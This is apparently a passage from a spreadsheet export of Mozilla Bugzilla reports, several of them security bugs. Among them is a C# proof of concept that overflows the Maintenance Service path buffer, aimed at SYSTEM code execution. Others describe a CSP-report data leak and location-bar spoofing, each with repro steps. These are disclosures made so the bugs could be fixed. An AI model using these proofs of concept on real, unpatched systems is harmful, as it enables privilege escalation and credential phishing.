      <c r="I4067" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4067" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K4067" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L4067" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4067" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4067" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4067" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4067" t="inlineStr">
        <is>
          <t>[adv-main23+][adv-esr1708+]</t>
        </is>
      </c>
      <c r="Q4067" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4067" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4067" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T4067" t="n">
        <v>1</v>
      </c>
      <c r="U4067" t="n">
        <v>0</v>
      </c>
      <c r="V4067" t="n">
        <v>14</v>
      </c>
      <c r="W4067" t="inlineStr">
        <is>
          <t>Created attachment 769022
Proof of concept source + binary
The WriteStatusFailure function in updatehelper.cpp fails to check the length of the update directory path provided before copying it into a string with a buffer of only MAX_PATH+1 length (http://hg.mozilla.org/mozilla-central/file/942686767e5e/toolkit/mozapps/update/common/updatehelper.cpp#l396).
The maintenance service passes a user-provided argument directly into this function, which leads to a buffer overflow and potential arbitrary code execution with SYSTEM privileges.
C# Proof-of-concept:
using System;
using System.ServiceProcess;
namespace WriteStatusBufferOverflow
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                ServiceController c = new ServiceController("MozillaMaintenance");
                c.Start(new string[] {  "aaa",
                                    "software-update",
                                    @"c:\program files (x86)\Mozilla Firefox\updater.exe",
                                    (new String('A',999))
                                     });
            }
            catch (Exception e) { 
                Console.WriteLine(e);
            }
        }
    }
}
Replicated on Windows 7 x64 with maintenanceservice.exe version 23.0.0.4923. The result is an entry in the Windows application event log that looks similar to this:
Faulting application name: maintenanceservice.exe, version: 23.0.0.4923, time stamp: 0x51c81b22
Faulting module name: maintenanceservice.exe, version: 23.0.0.4923, time stamp: 0x51c81b22
Exception code: 0xc0000409
Fault offset: 0x00004628
Faulting process id: 0x3728
Faulting application start time: 0x01ce74230b086bb8
Faulting application path: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Faulting module path: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
...
Have attached a compiled proof-of-concept, let me know if you need any further details.</t>
        </is>
      </c>
      <c r="X4067" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4068">
      <c r="A4068" t="n">
        <v>995817</v>
      </c>
      <c r="B4068" t="inlineStr">
        <is>
          <t>2014-04-13 16:52:30 -0700</t>
        </is>
      </c>
      <c r="C4068" t="inlineStr">
        <is>
          <t>Differential Testing: Incorrect result when division-by-zero is used in an indirectly-truncated context</t>
        </is>
      </c>
      <c r="D4068" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:27 -0700</t>
        </is>
      </c>
      <c r="E4068" t="n">
        <v>1</v>
      </c>
      <c r="F4068" t="n">
        <v>1</v>
      </c>
      <c r="G4068" t="n">
        <v>3</v>
      </c>
      <c r="H4068" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4068" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4068" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4068" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4068" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4068" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4068" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4068" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4068" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q4068" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4068" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4068" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T4068" t="n">
        <v>1</v>
      </c>
      <c r="U4068" t="n">
        <v>0</v>
      </c>
      <c r="V4068" t="n">
        <v>26</v>
      </c>
      <c r="W4068" t="inlineStr">
        <is>
          <t>setJitCompilerOption('baseline.usecount.trigger', 1)
let r;
(function() {
    function f() {
        return (1 + -1 / 0) &lt;&lt; null
    }
    print(f())
    print(f())
})()
$ ./js-opt-64-dm-ts-darwin-ebdf2740dc3e --fuzzing-safe --ion-parallel-compile=off 5098.js
0
0
$ ./js-opt-64-dm-ts-darwin-ebdf2740dc3e --fuzzing-safe --ion-parallel-compile=off --ion-eager 5098.js
0
1
(Tested this on 64-bit Mac js opt threadsafe deterministic shell off m-c rev ebdf2740dc3e)
My configure flags are:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/f98f80d2126c
user:        Jan de Mooij
date:        Sat Sep 28 11:45:21 2013 +0200
summary:     Bug 915763 - Remove TypeScript::dynamicList and dynamic Monitor functions. r=bhackett
Jan, is bug 915763 a possible regressor?</t>
        </is>
      </c>
      <c r="X4068" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4069">
      <c r="A4069" t="n">
        <v>500311</v>
      </c>
      <c r="B4069" t="inlineStr">
        <is>
          <t>2009-06-24 15:35:29 -0700</t>
        </is>
      </c>
      <c r="C4069" t="inlineStr">
        <is>
          <t>crash while loading video clip [@ memcpy - oggplay_data_handle_theora_frame]</t>
        </is>
      </c>
      <c r="D4069" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E4069" t="n">
        <v>1</v>
      </c>
      <c r="F4069" t="n">
        <v>1</v>
      </c>
      <c r="G4069" t="n">
        <v>3</v>
      </c>
      <c r="H4069" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4069" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4069" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4069" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4069" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4069" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4069" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4069" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4069" t="inlineStr">
        <is>
          <t>[sg:critical?] uninitialized memory</t>
        </is>
      </c>
      <c r="Q4069" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4069" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4069" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T4069" t="n">
        <v>1</v>
      </c>
      <c r="U4069" t="n">
        <v>0</v>
      </c>
      <c r="V4069" t="n">
        <v>47</v>
      </c>
      <c r="W4069" t="inlineStr">
        <is>
          <t>While testing Fx3.5rc3 on Vista, I visited the tinyvid.tv site and clicked on a few links, and one of them consistently crashed the browser while loading. It also crashes RC2, but does NOT crash in b4. Happens on Mac (latest Minefield).
http://crash-stats.mozilla.com/report/index/75648029-65ea-433f-b3d1-ca3d62090624
Steps:
1. Visit tinyvid.tv site
2. Click on clip "The Time Traveler's Wife trailer" link (video link is http://tinyvid.tv/file/2fb8pbzg1ahwj.ogg)
Expected: Play the clip
Actual: Browsers starts loading the clip, then crashes, consistently.</t>
        </is>
      </c>
      <c r="X4069" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4070">
      <c r="A4070" t="n">
        <v>1241292</v>
      </c>
      <c r="B4070" t="inlineStr">
        <is>
          <t>2016-01-20 13:54:09 -0800</t>
        </is>
      </c>
      <c r="C4070" t="inlineStr">
        <is>
          <t>Revisit "Your login could be compromised" string for Insecure Password Warning</t>
        </is>
      </c>
      <c r="D4070" t="inlineStr">
        <is>
          <t>2016-05-10 09:11:53 -0700</t>
        </is>
      </c>
      <c r="E4070" t="n">
        <v>1</v>
      </c>
      <c r="F4070" t="n">
        <v>1</v>
      </c>
      <c r="G4070" t="n">
        <v>2</v>
      </c>
      <c r="H4070" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4070" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4070" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4070" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4070" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4070" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4070" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4070" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4070" t="inlineStr">
        <is>
          <t>[fxprivacy]</t>
        </is>
      </c>
      <c r="Q4070" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4070" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4070" t="inlineStr">
        <is>
          <t>Firefox 46</t>
        </is>
      </c>
      <c r="T4070" t="n">
        <v>1</v>
      </c>
      <c r="U4070" t="n">
        <v>0</v>
      </c>
      <c r="V4070" t="n">
        <v>17</v>
      </c>
      <c r="W4070" t="inlineStr">
        <is>
          <t>When you visit an HTTP page that has a password field, Nightly (and soon dev edition) will show a degraded UI (lock with strikethrough).  When you click on that to open the Control Center, the message says:
"Your login could be compromised".
Matt proposes that we change that string (either in general or just for dev edition) to something that is aimed more at developers.  When we are ready to move the feature to the release channel, we can switch to a different string for general users.  A couple ideas:
"The login page could be compromised"
"This login page could be compromised" (although this might be a general purpose page that happens to also have a login form)
"Login pages should be served over HTTP"
"Passwords/(Credentials) should not be collected over HTTP"
"Passwords/(Credentials) should be collected over HTTPS"
It depends on who our audience is.  We could even have two separate strings - one for dev edition and one for everything else.
Matej, what do you think?</t>
        </is>
      </c>
      <c r="X4070" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4071">
      <c r="A4071" t="n">
        <v>660749</v>
      </c>
      <c r="B4071" t="inlineStr">
        <is>
          <t>2011-05-30 22:14:03 -0700</t>
        </is>
      </c>
      <c r="C4071" t="inlineStr">
        <is>
          <t>Firefox doesn't (re)validate certificates when loading a HTTPS page from the cache</t>
        </is>
      </c>
      <c r="D4071" t="inlineStr">
        <is>
          <t>2024-08-29 11:44:51 -0700</t>
        </is>
      </c>
      <c r="E4071" t="n">
        <v>1</v>
      </c>
      <c r="F4071" t="n">
        <v>1</v>
      </c>
      <c r="G4071" t="n">
        <v>3</v>
      </c>
      <c r="H4071" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4071" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4071" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K4071" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4071" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4071" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4071" t="inlineStr">
        <is>
          <t>NEW</t>
        </is>
      </c>
      <c r="O4071" t="inlineStr"/>
      <c r="P4071" t="inlineStr">
        <is>
          <t>[ETA:2012-03-28][psm-cert-errors][workaround comment 6][STR comment 19][necko-would-take]</t>
        </is>
      </c>
      <c r="Q4071" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R4071" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4071" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4071" t="n">
        <v>1</v>
      </c>
      <c r="U4071" t="n">
        <v>13</v>
      </c>
      <c r="V4071" t="n">
        <v>83</v>
      </c>
      <c r="W4071" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.16) Gecko/20110322 Fedora/3.6.16-1.fc14 Firefox/3.6.16
Build Identifier: Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
A Debian bug report indicated that Firefox 4.0.x handled the
validation/revalidation of SSL certificates improperly.  If a user were to
visit a site with an untrusted certificate, Firefox would correctly display the
warning about the untrusted connection.  If a user were to confirm the security
exception for a single session (not check off the "permanently store this
exception"), then restart the browser and re-load the page, the contents of the
page would be displayed from the Firefox cache.  Upon reloading the page, the
security warning would appear, but incorrectly indicates that the site provides
a valid, verified certificate and there is no way to confirm the exception.
This is not the case in Firefox 3.6.17 where when re-loading the browser and
visiting the page, the untrusted connection warning comes up immediately,
without showing the contents of the page, and allowing you to confirm the
exception.
Reproducible: Always
Steps to Reproduce:
1) Visit a site with a self-signed certificate (such as https://kitenet.net/)
and click "I Understand The Risks", click "Add Exception", uncheck "Permanently
store this exception", click "Confirm Security Exception".  The site's contents
will be displayed.
2) Exit the browser.
3) Start Firefox again and visit the page you visited in step 1.  The browser
will show the contents of the page, even though its certificate should no
longer be considered valid.
4) Refresh the page.  The untrusted connection warning will display again. 
Click "I Understand The Risks", click "Add Exception".  Firefox will indicate
that "This site provides valid, verified identification" and does not allow you
to confirm the security exception.
References:
[1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=627552
[2] https://bugzilla.redhat.com/show_bug.cgi?id=709165
Note: I am able to successfully reproduce this on firefox 4.0.1 on a Fedora-15 fresh install</t>
        </is>
      </c>
      <c r="X4071" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4072">
      <c r="A4072" t="n">
        <v>1097175</v>
      </c>
      <c r="B4072" t="inlineStr">
        <is>
          <t>2014-11-11 11:02:06 -0800</t>
        </is>
      </c>
      <c r="C4072" t="inlineStr">
        <is>
          <t>Break up advanced search into a separate view.</t>
        </is>
      </c>
      <c r="D4072" t="inlineStr">
        <is>
          <t>2014-11-20 11:21:57 -0800</t>
        </is>
      </c>
      <c r="E4072" t="n">
        <v>1</v>
      </c>
      <c r="F4072" t="n">
        <v>1</v>
      </c>
      <c r="G4072" t="n">
        <v>5</v>
      </c>
      <c r="H4072" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4072" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4072" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K4072" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4072" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4072" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4072" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4072" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4072" t="inlineStr">
        <is>
          <t>u=dev c=search p=3 s=2014.21</t>
        </is>
      </c>
      <c r="Q4072" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4072" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4072" t="inlineStr">
        <is>
          <t>2014Q4</t>
        </is>
      </c>
      <c r="T4072" t="n">
        <v>1</v>
      </c>
      <c r="U4072" t="n">
        <v>0</v>
      </c>
      <c r="V4072" t="n">
        <v>12</v>
      </c>
      <c r="W4072" t="inlineStr">
        <is>
          <t>Right now we have one huge view that does advanced search and normal search. We should break these things out so we can do more cool things in advanced search without affecting the simple search that is targeted to end users (vs contributors).
This means advanced search will be at a different URL, so we should redirect all existing advanced search URLs (?a=2) to the new URL.
I need to spend some time looking at it to figure out the details. I'll update this bug with some test cases that we should run through manually.</t>
        </is>
      </c>
      <c r="X4072" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4073">
      <c r="A4073" t="n">
        <v>345879</v>
      </c>
      <c r="B4073" t="inlineStr">
        <is>
          <t>2006-07-25 10:00:40 -0700</t>
        </is>
      </c>
      <c r="C4073" t="inlineStr">
        <is>
          <t>Crash when calling a function from a generator with less arguments than its arity [@ js_GetSlotThreadSafe]</t>
        </is>
      </c>
      <c r="D4073" t="inlineStr">
        <is>
          <t>2011-06-09 14:58:44 -0700</t>
        </is>
      </c>
      <c r="E4073" t="n">
        <v>1</v>
      </c>
      <c r="F4073" t="n">
        <v>1</v>
      </c>
      <c r="G4073" t="n">
        <v>3</v>
      </c>
      <c r="H4073" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4073" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4073" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4073" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4073" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4073" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4073" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4073" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4073" t="inlineStr"/>
      <c r="Q4073" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4073" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4073" t="inlineStr">
        <is>
          <t>mozilla1.8.1beta2</t>
        </is>
      </c>
      <c r="T4073" t="n">
        <v>1</v>
      </c>
      <c r="U4073" t="n">
        <v>0</v>
      </c>
      <c r="V4073" t="n">
        <v>10</v>
      </c>
      <c r="W4073" t="inlineStr">
        <is>
          <t>Sample code:
function gen() {
  yield isNaN()
}
f = gen()
f.next()
This crashes the shell immediately, the browser survives for a while (until it runs GC?). It works as fine if I replace isNaN() with isNaN(1).
The following variant gives an assertion:
function gen() {
  (yield 5)()
  yield
}
f = gen()
f.next()
f.send(Function())
Assertion failure: (uint32)2 &lt; JS_MIN(((thisp)-&gt;map)-&gt;freeslot, ((thisp)-&gt;map)-&gt;
nslots), at jsinterp.c:530
Talkback ID TB21405588G
(Line 530 instead of 529 because I already tried the patch from bug 345772.)</t>
        </is>
      </c>
      <c r="X4073" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4074">
      <c r="A4074" t="n">
        <v>1148470</v>
      </c>
      <c r="B4074" t="inlineStr">
        <is>
          <t>2015-03-27 09:24:09 -0700</t>
        </is>
      </c>
      <c r="C4074" t="inlineStr">
        <is>
          <t>Intermittent ratelimit failures</t>
        </is>
      </c>
      <c r="D4074" t="inlineStr">
        <is>
          <t>2015-07-12 23:49:58 -0700</t>
        </is>
      </c>
      <c r="E4074" t="n">
        <v>1</v>
      </c>
      <c r="F4074" t="n">
        <v>1</v>
      </c>
      <c r="G4074" t="n">
        <v>4</v>
      </c>
      <c r="H4074" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4074" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4074" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K4074" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4074" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4074" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4074" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4074" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4074" t="inlineStr"/>
      <c r="Q4074" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4074" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4074" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4074" t="n">
        <v>1</v>
      </c>
      <c r="U4074" t="n">
        <v>0</v>
      </c>
      <c r="V4074" t="n">
        <v>3</v>
      </c>
      <c r="W4074" t="inlineStr">
        <is>
          <t>Sometimes, we get a test assertion error on::
 for i in range(ratelimit_limit):
      self.client.get(url_protected_by_ratelimit)
 response = self.client.get(url_protected_by_ratelimit)
 eq_(response.status_code, 429)
The only explanation for why this might happen is if some of those self.client.get() calls happen at MM:59 and some happen at MM+1:01 thus spreading the load over two minutes.</t>
        </is>
      </c>
      <c r="X4074" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4075">
      <c r="A4075" t="n">
        <v>1069762</v>
      </c>
      <c r="B4075" t="inlineStr">
        <is>
          <t>2014-09-18 22:23:15 -0700</t>
        </is>
      </c>
      <c r="C4075" t="inlineStr">
        <is>
          <t>CSP violation report contains sensitive data of other origin after redirect</t>
        </is>
      </c>
      <c r="D4075" t="inlineStr">
        <is>
          <t>2024-05-30 08:37:17 -0700</t>
        </is>
      </c>
      <c r="E4075" t="n">
        <v>1</v>
      </c>
      <c r="F4075" t="n">
        <v>1</v>
      </c>
      <c r="G4075" t="n">
        <v>3</v>
      </c>
      <c r="H4075" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4075" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4075" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4075" t="inlineStr">
        <is>
          <t>35 Branch</t>
        </is>
      </c>
      <c r="L4075" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4075" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N4075" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4075" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4075" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main34+]</t>
        </is>
      </c>
      <c r="Q4075" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4075" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4075" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T4075" t="n">
        <v>1</v>
      </c>
      <c r="U4075" t="n">
        <v>0</v>
      </c>
      <c r="V4075" t="n">
        <v>35</v>
      </c>
      <c r="W4075" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Steps to reproduce:
1) Login to Facebook
2) Launch http://mallory.csrf.jp/cspleakage/
3) The page has one object tag in a page and the object tag accesses https://facebook.com/profile.php
4) Facebook redirects user agent to his/her profile page i.e., https://www.facebook.com/muneaki.nishimura in my case.
Actual results:
When a user launches the page http://mallory.csrf.jp/cspleakage/ , CSP violation report is posted to the report-uri because the object tag violates it's security policy.
Then, the "blocked-uri" parameter contains path and query string values of facebook.com, i.e., my name "muneaki.nishimura" is also recorded.
Suppose http://mallory.csrf.jp/cspleakage/ is a phishing site, then, user name who visited to the page can be identified by blocked-uri field.
As a proof of concept of this phenomenon, you can check the CSP report which sent by your browser from following page.
http://mallory.csrf.jp/cspleakage/log.txt
Expected results:
"blocked-uri" parameter has not to contain path and query string parameter of other origin than protected resources because it can be used for retrieving sensitive information e.g., OAuth token or session ID.
Similar issue was once fixed on Firefox 14 (see below).
https://www.mozilla.org/security/announce/2012/mfsa2012-53.html
However, there are still remaining issues in the latest branch.</t>
        </is>
      </c>
      <c r="X4075" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4076">
      <c r="A4076" t="n">
        <v>1344517</v>
      </c>
      <c r="B4076" t="inlineStr">
        <is>
          <t>2017-03-04 14:48:47 -0800</t>
        </is>
      </c>
      <c r="C4076" t="inlineStr">
        <is>
          <t>Firefox for Android: Location Bar Spoofing Risk - The Location Bar remains hidden using scroll event and another website is loaded during this scroll event (Patch for Bug 1293463 doesn't prevent completely Location Bar Spoofing risks)</t>
        </is>
      </c>
      <c r="D4076" t="inlineStr">
        <is>
          <t>2024-05-30 09:30:02 -0700</t>
        </is>
      </c>
      <c r="E4076" t="n">
        <v>1</v>
      </c>
      <c r="F4076" t="n">
        <v>1</v>
      </c>
      <c r="G4076" t="n">
        <v>6</v>
      </c>
      <c r="H4076" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4076" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J4076" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4076" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L4076" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4076" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4076" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4076" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4076" t="inlineStr">
        <is>
          <t>[adv-main53+]</t>
        </is>
      </c>
      <c r="Q4076" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4076" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4076" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T4076" t="n">
        <v>0</v>
      </c>
      <c r="U4076" t="n">
        <v>0</v>
      </c>
      <c r="V4076" t="n">
        <v>23</v>
      </c>
      <c r="W4076" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:51.0) Gecko/20100101 Firefox/51.0
Build ID: 20170125094131
Steps to reproduce:
I noticed that the patch for Bug 1293463 does not prevent all Location Bar Spoofing risks because this patch consists to show the real location bar only when the user clicks on a HTML editable tag (&lt;input type=text&gt; ; &lt;input type=password&gt; ; &lt;textarea&gt;).
The essential problem of patch for Bug 1293463 is that the fake location bar continues to replace the real location bar.
Multiple websites, especially the bank websites allowing access to users' bank accounts using a numeric keypad or a web virtual keyboard to write its user credentials (customer-ID and Password).
So, a click on an input tag isn't used by these bank websites (leading to the fake location bar continue to be displayed and the real location bar remains hidden during the writing of user credentials by a numeric keypad or a web virtual keyboard).
NOTE: it's also possible to use fake Android Keyboard to write user credentials needed into a fake &lt;input&gt; tag.
Steps:
Step 1: Go to http://www.alternativ-testing.fr/Research/Mozilla/android/~h5fh85f9j03ftrK9-Location%20Bar%20Spoofing%20with%20scroll%20event%20and%20another%20webpage%20with%20a%20long%20time%20for%20loading~/index-start-1.html and click on the link (a Google search webpage will be opened into a new tab)
Step 2: Scroll down into this webpage (the location bar disappears) , during this scroll event a malicious webpage will load slowly without that the real Location Bar appears leading to Location Bar Spoofing risks (The real Location Bar remains hidden and a fake location bar will replace this real Location Bar). 
&lt;!&gt;Step2 INFO : The loading time of the malicious webpage is 9 seconds when you go on the Google search webpage but this loading time can be changed by a bigger loading time. (The PHP code of "redirect-and-sleep().php" can be changed by a bigger or smaller loading time).&lt;!&gt;
Info about the malicious webpage: The malicious webpage, a numeric keypad should be used to write the Customer ID and the Password (like it is used on the login webpage in a bank website.
Actual results:
The fake location bar continue to be displayed and the real location bar remains hidden during the writing of user credentials by a numeric keypad or a web virtual keyboard.
The Location Bar remains hidden when the malicious webpage is loaded and this malicious webpage contains a fake Location Bar leading to a Location Bar URL / SSL Spoofing Risk.
Expected results:
The Location Bar should reappear when another webpage is loaded.
When the user scroll down into a first webpage and a 2nd webpage/website is loaded during this scroll event, the real location bar should reappear when the 2nd webpage is completely loaded.
Solution: The Location Bar should be always visible when another webpage is completely loaded.</t>
        </is>
      </c>
      <c r="X4076" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4077">
      <c r="A4077" t="n">
        <v>54009</v>
      </c>
      <c r="B4077" t="inlineStr">
        <is>
          <t>2000-09-25 07:44:48 -0700</t>
        </is>
      </c>
      <c r="C4077" t="inlineStr">
        <is>
          <t>crashes at nsExternalHelperAppService::FillTopLevelProperties</t>
        </is>
      </c>
      <c r="D4077" t="inlineStr">
        <is>
          <t>2010-01-29 13:24:33 -0800</t>
        </is>
      </c>
      <c r="E4077" t="n">
        <v>1</v>
      </c>
      <c r="F4077" t="n">
        <v>1</v>
      </c>
      <c r="G4077" t="n">
        <v>2</v>
      </c>
      <c r="H4077" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4077" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
